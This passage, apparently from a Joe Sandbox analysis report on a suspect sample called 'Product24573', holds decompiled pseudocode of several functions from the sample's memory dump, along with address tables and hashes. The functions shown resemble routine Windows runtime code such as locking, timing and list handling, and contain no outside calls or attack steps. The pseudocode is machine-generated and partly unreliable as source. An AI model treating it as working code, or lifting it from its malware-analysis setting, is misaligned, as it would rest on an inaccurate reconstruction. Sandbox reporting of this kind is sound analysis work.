								_t59 = _v8;
								E011BEA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E01117D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E011B1608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E011C1536(0x11e8ae4, (_t74 -  *0x11e8b04 >> 0x14) + (_t74 -  *0x11e8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L011BC323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E011BA80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0119CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E011BACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                                          0x011bae44
                                          0x011bae4c
                                          0x011bae53
                                          0x011bae55
                                          0x011bae5c
                                          0x011bae64
                                          0x011bae68
                                          0x011bae75
                                          0x011bae75
                                          0x011bae78
                                          0x011bae7a
                                          0x011bae7c
                                          0x011bae7f
                                          0x011baea8
                                          0x011baeab
                                          0x011baead
                                          0x00000000
                                          0x00000000
                                          0x011baeb3
                                          0x011baeb8
                                          0x011baebb
                                          0x011baebd
                                          0x00000000
                                          0x011bae81
                                          0x011bae88
                                          0x011bae8f
                                          0x011bae9b
                                          0x011bae96
                                          0x011bae96
                                          0x011bae96
                                          0x011baea0
                                          0x011baea3
                                          0x011baebf
                                          0x011baebf
                                          0x011baec3
                                          0x011baec9
                                          0x011baf0d
                                          0x011baf14
                                          0x011baf3d
                                          0x011baf3d
                                          0x011baf41
                                          0x011baf44
                                          0x011baf67
                                          0x011baf67
                                          0x011baf6a
                                          0x011bafca
                                          0x011bafd1
                                          0x00000000
                                          0x011bafd1
                                          0x011baf6c
                                          0x011baf6d
                                          0x011baf75
                                          0x011baf7c
                                          0x011baf7e
                                          0x011baf80
                                          0x011baf85
                                          0x011baf87
                                          0x011baf99
                                          0x011baf89
                                          0x011baf92
                                          0x011baf92
                                          0x011baf9e
                                          0x011bafa1
                                          0x011bafa3
                                          0x011bafa9
                                          0x011bafb0
                                          0x011bafb2
                                          0x011bafb4
                                          0x011bafbc
                                          0x011bafbc
                                          0x011bafb4
                                          0x011bafb0
                                          0x00000000
                                          0x011bafa1
                                          0x011baf4f
                                          0x011baf57
                                          0x011baf5c
                                          0x011baf5e
                                          0x00000000
                                          0x00000000
                                          0x011baf60
                                          0x011baf64
                                          0x011baf64
                                          0x00000000
                                          0x011baf64
                                          0x011baf1a
                                          0x011baf25
                                          0x00000000
                                          0x00000000
                                          0x011baf27
                                          0x011baf28
                                          0x011baf33
                                          0x00000000
                                          0x011baed0
                                          0x011baed0
                                          0x011baed2
                                          0x011baee1
                                          0x011baee4
                                          0x00000000
                                          0x00000000
                                          0x011baee6
                                          0x011baeec
                                          0x00000000
                                          0x00000000
                                          0x011baefb
                                          0x011baf07
                                          0x011bafd3
                                          0x011bafdb
                                          0x011bafdb
                                          0x00000000
                                          0x011baf07
                                          0x011baed6
                                          0x011baed8
                                          0x011baedf
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011baedf
                                          0x011baec9

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 46a0f2650488ac67a29314b2613d7e5f1d94422f0af967de64c0ed7d93c29b9f
                                          • Instruction ID: 0440f327d14da1cf75c9dfaf2bee9cd300e0ee5347ae05f370af7fc660a3edb2
                                          • Opcode Fuzzy Hash: 46a0f2650488ac67a29314b2613d7e5f1d94422f0af967de64c0ed7d93c29b9f
                                          • Instruction Fuzzy Hash: 1841E5717042119BD72E9A2DE8D4BFFBB9AAF94624F04421DF966C72D0D734D801C792
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0111DBE9 Relevance: .1, Instructions: 149COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E0111DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E010FCC50(E010F4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E01117D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E011C8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E01112280(_t58, _v44);
						E0111DD82(_v44, _t102, _t98);
						E0111B944(_t102, _v5);
						return E0110FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x11e8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x11e862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x11e8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x11e862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x11bfb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                          0x0111dbe9
                                          0x0111dbf2
                                          0x0111dbf7
                                          0x0111dbf9
                                          0x0111dbfc
                                          0x0111dc00
                                          0x0111dc03
                                          0x0111dc14
                                          0x0111dd54
                                          0x0111dd54
                                          0x0111dd54
                                          0x0111dc18
                                          0x0111dc1d
                                          0x0111dc1d
                                          0x0111dc32
                                          0x0111dc3b
                                          0x0111dc3e
                                          0x0111dc46
                                          0x0111dd5b
                                          0x0111dd62
                                          0x0111dd64
                                          0x0111dd67
                                          0x0111dd69
                                          0x0111dd6b
                                          0x0111dd6e
                                          0x0111dd70
                                          0x0111dd73
                                          0x0111dd73
                                          0x00000000
                                          0x0111dc4c
                                          0x0111dc4e
                                          0x01163ae3
                                          0x01163ae8
                                          0x01163aea
                                          0x0111dce7
                                          0x0111dce9
                                          0x0111dcec
                                          0x0111dcee
                                          0x0111dcf0
                                          0x0111dcf3
                                          0x0111dcf5
                                          0x01163af2
                                          0x01163af5
                                          0x01163af5
                                          0x0111dd06
                                          0x0111dd08
                                          0x0111dd0b
                                          0x0111dd12
                                          0x01163b08
                                          0x0111dd18
                                          0x0111dd18
                                          0x0111dd18
                                          0x0111dd20
                                          0x0111dd23
                                          0x01163b16
                                          0x01163b16
                                          0x0111dd29
                                          0x0111dd2d
                                          0x0111dd36
                                          0x0111dd40
                                          0x0111dd51
                                          0x0111dd51
                                          0x0111dc54
                                          0x0111dc59
                                          0x0111dc59
                                          0x0111dc5e
                                          0x0111dc5e
                                          0x0111dc63
                                          0x0111dc66
                                          0x0111dc6b
                                          0x0111dc78
                                          0x0111dc7b
                                          0x0111dc81
                                          0x0111dc81
                                          0x0111dc83
                                          0x0111dc89
                                          0x00000000
                                          0x00000000
                                          0x0111dd7b
                                          0x0111dd7b
                                          0x0111dc8f
                                          0x0111dc8f
                                          0x0111dc92
                                          0x0111dc99
                                          0x0111dc9f
                                          0x0111dca5
                                          0x0111dcaa
                                          0x0111dcaa
                                          0x0111dcb3
                                          0x0111dcb8
                                          0x0111dcbb
                                          0x0111dcc1
                                          0x0111dccf
                                          0x0111dcd2
                                          0x0111dcd5
                                          0x0111dcd7
                                          0x0111dcda
                                          0x0111dcdc
                                          0x0111dcdc
                                          0x0111dce2
                                          0x0111dce4
                                          0x00000000
                                          0x0111dce4

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 93b52a9592658af082ab19d7192adc8c6c4f191c2f7f9cd23c12770ab26a303c
                                          • Instruction ID: a314511b2b2ceb3102bca240c9ee98921287257af3b0ebddf23c0328923cf3c1
                                          • Opcode Fuzzy Hash: 93b52a9592658af082ab19d7192adc8c6c4f191c2f7f9cd23c12770ab26a303c
                                          • Instruction Fuzzy Hash: E351BF71A00206CFCF18CFACD484A9EFBF5BB48310F21856AD559A7388DB31A944CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0110EF40 Relevance: .1, Instructions: 147COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E0110EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E010F9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x7788c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E010F2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                          0x0110ef4b
                                          0x0110ef4d
                                          0x0110ef57
                                          0x0110f0bd
                                          0x0110f0c2
                                          0x0110f0d2
                                          0x0110f0d2
                                          0x0110f0c2
                                          0x0110ef5d
                                          0x0110ef5f
                                          0x0110ef67
                                          0x0110ef6a
                                          0x0110ef6d
                                          0x0110ef74
                                          0x0110ef7f
                                          0x0110ef82
                                          0x0110ef82
                                          0x0110ef86
                                          0x0110ef88
                                          0x0110ef8c
                                          0x0110ef8f
                                          0x0110ef8f
                                          0x0110ef8f
                                          0x00000000
                                          0x0110ef91
                                          0x0110ef93
                                          0x0110efc4
                                          0x0110efc4
                                          0x0110efc4
                                          0x0110efca
                                          0x0110efd0
                                          0x0110f0a6
                                          0x00000000
                                          0x00000000
                                          0x0110f0af
                                          0x0115bb06
                                          0x0115bb0a
                                          0x0110f0b5
                                          0x0110f0b5
                                          0x0110f0b5
                                          0x0110f0b5
                                          0x00000000
                                          0x0110efd6
                                          0x0110efd9
                                          0x0110f0de
                                          0x0110f0e2
                                          0x0110efdf
                                          0x0110efdf
                                          0x0110efdf
                                          0x0110efe5
                                          0x0115bafc
                                          0x0115bafc
                                          0x0110efe5
                                          0x0110efeb
                                          0x0110efed
                                          0x0110f00f
                                          0x0110f011
                                          0x0110f01a
                                          0x0110f01d
                                          0x0110f021
                                          0x0110f028
                                          0x0110f029
                                          0x0110f029
                                          0x0110f02c
                                          0x00000000
                                          0x0110f02c
                                          0x0110eff3
                                          0x0110eff9
                                          0x0110f0ea
                                          0x0110f0ed
                                          0x0110f0ef
                                          0x00000000
                                          0x0110f0ef
                                          0x0110f003
                                          0x0115bb12
                                          0x0110f045
                                          0x0110f049
                                          0x0110f051
                                          0x0110f09e
                                          0x0110f0a0
                                          0x0110f0a0
                                          0x0110f09e
                                          0x0110f053
                                          0x0110f064
                                          0x0110f064
                                          0x0110f06b
                                          0x0115bb1a
                                          0x0115bb1a
                                          0x0110f071
                                          0x0110f071
                                          0x0110f07d
                                          0x0110f082
                                          0x0110f08f
                                          0x0110f08f
                                          0x0110f009
                                          0x0110f00d
                                          0x00000000
                                          0x0110f00d
                                          0x0110efd0
                                          0x0110ef97
                                          0x0110efa5
                                          0x0110efaa
                                          0x00000000
                                          0x0110efac
                                          0x0110efac
                                          0x0110efac
                                          0x00000000
                                          0x0110efb2
                                          0x0110f036
                                          0x0110f03a
                                          0x0110f040
                                          0x0110f090
                                          0x00000000
                                          0x0110f092
                                          0x0110f042
                                          0x00000000
                                          0x0110f042
                                          0x0110efb7
                                          0x0110efb9
                                          0x0110efbc
                                          0x0110efb0
                                          0x0110efb0
                                          0x00000000
                                          0x0110efbe
                                          0x0110efbe
                                          0x0110efc1
                                          0x00000000
                                          0x0110efc1
                                          0x0110efbc
                                          0x0110efaa
                                          0x0110ef91

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                          • Instruction ID: 0d749825ed82ecf862137d7d951ca1cbf80029de6a05f741b08cb9c3b9e93623
                                          • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                          • Instruction Fuzzy Hash: 90510630E0524ADFEB2ECB69C1917AEBBB2AF05314F1881ACD555572C2C3B5A989C742
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011C740D Relevance: .1, Instructions: 141COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 84%
                                          			E011C740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0114D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0113F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L01114620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L01114620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0113F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L01114620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                          0x011c740d
                                          0x011c740d
                                          0x011c7412
                                          0x011c7413
                                          0x011c7416
                                          0x011c7418
                                          0x011c741c
                                          0x011c741f
                                          0x011c7422
                                          0x011c7422
                                          0x011c7428
                                          0x011c742a
                                          0x011c742a
                                          0x011c7451
                                          0x011c7432
                                          0x011c744f
                                          0x011c744f
                                          0x00000000
                                          0x011c7434
                                          0x011c7438
                                          0x011c7443
                                          0x011c7517
                                          0x011c7517
                                          0x011c751a
                                          0x011c7535
                                          0x011c7520
                                          0x011c7527
                                          0x011c752c
                                          0x011c7531
                                          0x011c7533
                                          0x00000000
                                          0x011c7533
                                          0x00000000
                                          0x011c7531
                                          0x011c754b
                                          0x011c754f
                                          0x011c755c
                                          0x011c755c
                                          0x011c755f
                                          0x011c7560
                                          0x011c7561
                                          0x011c7562
                                          0x011c7563
                                          0x011c7568
                                          0x011c756a
                                          0x011c756c
                                          0x011c756d
                                          0x011c756d
                                          0x011c756f
                                          0x011c7572
                                          0x011c7574
                                          0x011c7577
                                          0x011c757c
                                          0x011c757f
                                          0x00000000
                                          0x011c7551
                                          0x011c7551
                                          0x011c7551
                                          0x011c7553
                                          0x011c7553
                                          0x011c7449
                                          0x011c7449
                                          0x011c744c
                                          0x011c744c
                                          0x00000000
                                          0x011c744c
                                          0x011c7443
                                          0x011c750e
                                          0x011c7514
                                          0x011c7514
                                          0x011c7455
                                          0x011c7469
                                          0x011c746d
                                          0x00000000
                                          0x011c7473
                                          0x011c7473
                                          0x011c7476
                                          0x011c7480
                                          0x011c7484
                                          0x011c748e
                                          0x011c7493
                                          0x011c7493
                                          0x011c7496
                                          0x011c7499
                                          0x011c74a1
                                          0x011c74b1
                                          0x011c74b5
                                          0x00000000
                                          0x011c74bb
                                          0x011c74c1
                                          0x011c74c1
                                          0x011c74c4
                                          0x011c74c5
                                          0x011c74c6
                                          0x011c74c7
                                          0x011c74c8
                                          0x011c74cd
                                          0x00000000
                                          0x011c74d3
                                          0x011c74d3
                                          0x011c74d6
                                          0x011c74d8
                                          0x011c74db
                                          0x011c74dd
                                          0x011c74e0
                                          0x011c74e7
                                          0x011c74ee
                                          0x011c74ee
                                          0x011c74f4
                                          0x011c74f9
                                          0x00000000
                                          0x011c74fb
                                          0x011c74fb
                                          0x011c74fd
                                          0x011c7500
                                          0x011c7503
                                          0x011c7505
                                          0x011c7505
                                          0x011c74f9
                                          0x00000000
                                          0x011c74cd
                                          0x011c74b5
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                          • Instruction ID: bf5164e5fbbb8ad2965c0f716ca9ae99d579ab8eca2d606f8a0b1def797e9da3
                                          • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                          • Instruction Fuzzy Hash: E551AD71600646EFDB1ACF18C480A92FBB5FF64704F1580AAE9089F252E3B1E946CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01122990 Relevance: .1, Instructions: 133COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 97%
                                          			E01122990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x11cff00);
				E0114D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x10d1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0113E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x10d1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E011751BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x10d166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
